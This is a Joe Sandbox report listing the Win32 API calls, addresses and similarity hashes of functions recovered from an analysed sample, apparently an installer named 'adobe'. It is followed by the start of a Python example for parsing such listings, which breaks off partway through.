                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0045633C: CoInitialize.OLE32(00000000), ref: 00456342
                                                                                                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004563D0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                                                          • API String ID: 2906209438-2320870614
                                                                                                                                                          • Opcode ID: 8eb7e1381b7e672ad2a7344b2bac27be7e78fa256b825852c662775a39c4309b
                                                                                                                                                          • Instruction ID: 1abb1b48a8e62328c6f092af9ad77e929cec705f494ad64131ae41d6fe2497e3
                                                                                                                                                          • Opcode Fuzzy Hash: 8eb7e1381b7e672ad2a7344b2bac27be7e78fa256b825852c662775a39c4309b
                                                                                                                                                          • Instruction Fuzzy Hash: FCC012A0700210968A0033BA040220F18189B4071AB92803FB804EB19BDE7D880A8A6E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BF7D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                          • API String ID: 2492108670-2683653824
                                                                                                                                                          • Opcode ID: 08c210e061ed3df4adb01dd349e0985179ba97b5dde0629fc048e166c27f437f
                                                                                                                                                          • Instruction ID: a4db22b894df409b76fade00448711417f6f44e3f9dbbe63c1fbbb1ae142da4b
                                                                                                                                                          • Opcode Fuzzy Hash: 08c210e061ed3df4adb01dd349e0985179ba97b5dde0629fc048e166c27f437f
                                                                                                                                                          • Instruction Fuzzy Hash: A9B092A0700680C2CB0877B76C0270B1518D781704B60C07F7080EB6E6EBBC88464FEE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,0048054C), ref: 004804E4
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004804F5
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0048050D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Menu$Append$System
• String ID:
• API String ID: 1489644407-0
• Opcode ID: bbca4fd67f39214df91e3fd5a169f9f242fc7eb865d7f9f610c6779bc50a8817
• Instruction ID: 37bc61f9525b2f85d35cba9275b34e96d04578a8d39959fdf84d3e6d1fe946b0
• Opcode Fuzzy Hash: bbca4fd67f39214df91e3fd5a169f9f242fc7eb865d7f9f610c6779bc50a8817
• Instruction Fuzzy Hash: 2D31CF303543406AD721FB369C86BAF3A949B1171CF44087BF900AA2D3CA7C9C4987AD
Uniqueness
Uniqueness Score: -1.00%

APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
• TranslateMessage.USER32(?), ref: 0042449F
• DispatchMessageA.USER32(?), ref: 004244A9
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
• Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
• Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
• Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetPropA.USER32(00000000,00000000), ref: 0041667A
• SetPropA.USER32(00000000,00000000), ref: 0041668F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
• Opcode ID: 8bb14b94ad0c536f8101303e76f95fc424254f815c897ac0610855fcccbe07bb
• Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
• Opcode Fuzzy Hash: 8bb14b94ad0c536f8101303e76f95fc424254f815c897ac0610855fcccbe07bb
• Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(?), ref: 0041EE74
• IsWindowEnabled.USER32(?), ref: 0041EE7E
• EnableWindow.USER32(?,00000000), ref: 0041EEA4
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$EnableEnabledVisible
• String ID:
• API String ID: 3234591441-0
• Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
• Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
• Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
• Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetActiveWindow.USER32(?), ref: 00480E0E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ActiveWindow
• String ID: InitializeWizard
• API String ID: 2558294473-2356795471
• Opcode ID: de91dab70681d844d28204161b141a469312065f9c2e90e1064e61b7339a4e9a
• Instruction ID: 0b95fc32d463599106473d5585650a8af358dd80bcac62c86fd07979e218b19d
• Opcode Fuzzy Hash: de91dab70681d844d28204161b141a469312065f9c2e90e1064e61b7339a4e9a
• Instruction Fuzzy Hash: CB119D302142049FD310EBAAFD42B1E7BA4E716728F10447BE804D76A1EB796C64CB9D
Uniqueness
Uniqueness Score: -1.00%

APIs
• Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B406,00000000,0047B540), ref: 0047B205
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 0047B1D5
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 4114cd683091933fe49415c0c50bb4c54809aa79fa0bcf10601736be04f09168
• Instruction ID: 22c72f1ff155fe51a1e4b505a8227949295a7cd5e59db6d8f16ea4f3083837ab
• Opcode Fuzzy Hash: 4114cd683091933fe49415c0c50bb4c54809aa79fa0bcf10601736be04f09168
• Instruction Fuzzy Hash: 59F0897170451867D700A5DA5C46B9E669DCB84718F20407BF508DB343DAB99D0203DC
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E6AA,?,?,00000000,0046E840,?,_is1,?), ref: 0046E03F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Value
• String ID: NoModify
• API String ID: 3702945584-1699962838
• Opcode ID: c91bb8390a179d2518080c17e4406ccc72a50bd5ac54a06ac17507637b62d986
• Instruction ID: f0f3608ed547cc333ffef6632fe60bcb7ab783db0a368fb437208b4f6334264f
• Opcode Fuzzy Hash: c91bb8390a179d2518080c17e4406ccc72a50bd5ac54a06ac17507637b62d986
• Instruction Fuzzy Hash: FAE04FB4600304BFEB04EB95CD4AF6B77ECDB48710F104059BA049B2C1E674EE00C668
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045387F,?,00000000,004538E9,?,?,-00000001,00000000,?,0047BA45,00000000,0047B994,00000000), ref: 0045385B
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00453886,0045387F,?,00000000,004538E9,?,?,-00000001,00000000,?,0047BA45,00000000,0047B994,00000000,00000001), ref: 00453879
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2066263336-0
                                                                                                                                                          • Opcode ID: eaa0cc0d37466db83b7378a61d8ab9191ace993c3658d7bbc7356b17c3ba3b9c
                                                                                                                                                          • Instruction ID: e2366e05c35014b16e4179b3a35018bf351f0d04ff8316dee8ab98ed304049b6
                                                                                                                                                          • Opcode Fuzzy Hash: eaa0cc0d37466db83b7378a61d8ab9191ace993c3658d7bbc7356b17c3ba3b9c
                                                                                                                                                          • Instruction Fuzzy Hash: 8881A47090424DAFCF15EF55C8407EFBBB4AF49346F1480AAE85467392D3399B4ACB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047CE6F,?,-0000001A,0047EDCE,-00000010,?,00000004,0000001A,00000000,0047F11B,?,0045D388), ref: 0047CC06
                                                                                                                                                            • Part of subcall function 0042E244: 73A1A570.USER32(00000000,00000000,0047F182,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E), ref: 0042E253
                                                                                                                                                            • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047F182,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                                                                                                            • Part of subcall function 0042E244: 73A1A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047F182,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                                                                                                          • SendNotifyMessageA.USER32(00020466,00000496,00002711,-00000001), ref: 0047CDD6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2685184028-0
                                                                                                                                                          • Opcode ID: fe334f644459717bfbf4afd4f15e41703215b1e70e8f6aa107e3ed3cc630e592
                                                                                                                                                          • Instruction ID: 159e6411eecd54bbf62f5d649944b6adb8f27d330611ae1ee8a959584b2ccba9
                                                                                                                                                          • Opcode Fuzzy Hash: fe334f644459717bfbf4afd4f15e41703215b1e70e8f6aa107e3ed3cc630e592
                                                                                                                                                          • Instruction Fuzzy Hash: F75172342001009BC721FF2AE9C568B7BE9EB54309B50C53FA8499B7A6C73CDD468B9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,004021FC), ref: 004020CB
                                                                                                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02399EC4,000030C8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 296031713-0
                                                                                                                                                          • Opcode ID: ab36081b635f180fcbd9c72ddfa2df4ff1194ff7a3e80535640a75ab74e64123
                                                                                                                                                          • Instruction ID: 43da59c6024c014fdcfbd4f667e22ace29d18c19eb36fc191a59cc880b6cb292
                                                                                                                                                          • Opcode Fuzzy Hash: ab36081b635f180fcbd9c72ddfa2df4ff1194ff7a3e80535640a75ab74e64123
                                                                                                                                                          • Instruction Fuzzy Hash: C941F4B2E003409FDB10CF68DD8921A77A4F7A8328F15417BD844A77E1D3B89851CB89
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3660427363-0
                                                                                                                                                          • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                                                                                          • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                                                                                                          • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                                                                                          • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseEnum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2818636725-0
                                                                                                                                                          • Opcode ID: 4f2ca0f2844ab6484133a529d123ab7a4672b024258e86c6ade1300004d9a857
                                                                                                                                                          • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                                                                                                          • Opcode Fuzzy Hash: 4f2ca0f2844ab6484133a529d123ab7a4672b024258e86c6ade1300004d9a857
                                                                                                                                                          • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$FindFree
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4097029671-0
                                                                                                                                                          • Opcode ID: b98da3a4fc1bdf2447d357c19413e6e4fb323061471e88bf3521ae634e34e4c2
                                                                                                                                                          • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                                                                                                          • Opcode Fuzzy Hash: b98da3a4fc1bdf2447d357c19413e6e4fb323061471e88bf3521ae634e34e4c2
                                                                                                                                                          • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

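The function entries above list, per recovered function, the Win32 APIs it calls (direct calls and calls reached through a subcall) together with their call-site addresses. The following Python is an added example and is not part of the Joe Sandbox report or its tooling: it parses those "APIs" blocks into structured records, tags the direct calls with coarse capability labels (the tag table is this example's own assumption, not a Joe Sandbox classification), and checks that an enumeration API is paired with its close call inside the same function. The embedded listing is constructed from the FindNextFileA, RtlEnterCriticalSection and RegEnumKeyExA entries above, with their argument lists shortened.

```python
"""Parse the per-function API listing of a Joe Sandbox report (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One API line as printed in the report, e.g.
#   • FindNextFileA.KERNEL32(000000FF,?,...), ref: 0045385B
#   • Part of subcall function 004019CC: LocalAlloc.KERNEL32(...), ref: 00401A1F
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Constructed sample: three entries copied from the report above, arguments shortened.
SAMPLE_LISTING = """\
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0045387F,?,00000000,004538E9,?,?,-00000001), ref: 0045385B
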